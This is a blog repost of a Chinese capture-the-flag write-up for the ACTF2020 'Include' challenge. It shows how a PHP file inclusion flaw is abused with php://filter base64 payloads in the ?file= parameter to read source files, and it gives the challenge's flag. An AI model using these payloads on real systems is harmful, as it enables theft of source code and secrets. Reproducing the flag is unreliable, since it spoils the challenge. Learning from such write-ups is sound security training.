[ACTF2020 新生赛]Include
2021/8/8 23:37:28
本文主要是介绍[ACTF2020 新生赛]Include,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
01题目题解
打开链接
点击tips
url中含有?file=flag.php,题目提示include,猜测存在文件包含漏洞
利用伪协议php://filter查看文件源码
构造/?file=php://filter/resource=flag.php发现没有反应
构造/?file=php://filter/read=convert.base64-encode/resource=flag.php得到一堆字符串
将字符进行base64解码
得到flag{f27d458e-43fa-481d-a009-5d0bc5a1d95c}
02知识点
php://filter可以获取指定文件源码。当它与包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码,让其不执行。从而导致 任意文件读取。
?file=php://filter/resource=xxx.php
直接读取xxx.php文件,但大多数时候很多信息无法直接显示在浏览器页面上
?file=php://filter/read=convert.base64-encode/resource=xxx.php
将文件内容进行base64编码后显示在浏览器上,再自行解码
这篇关于[ACTF2020 新生赛]Include的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-12-27Nacos多环境配置学习入门
- 2024-12-27Nacos快速入门学习入门
- 2024-12-27Nacos快速入门学习入门
- 2024-12-27Nacos配置中心学习入门指南
- 2024-12-27Nacos配置中心学习入门
- 2024-12-27Nacos做项目隔离学习入门
- 2024-12-27Nacos做项目隔离学习入门
- 2024-12-27Nacos初识学习入门:轻松掌握服务发现与配置管理
- 2024-12-27Nacos初识学习入门:轻松掌握Nacos基础操作
- 2024-12-27Nacos多环境配置学习入门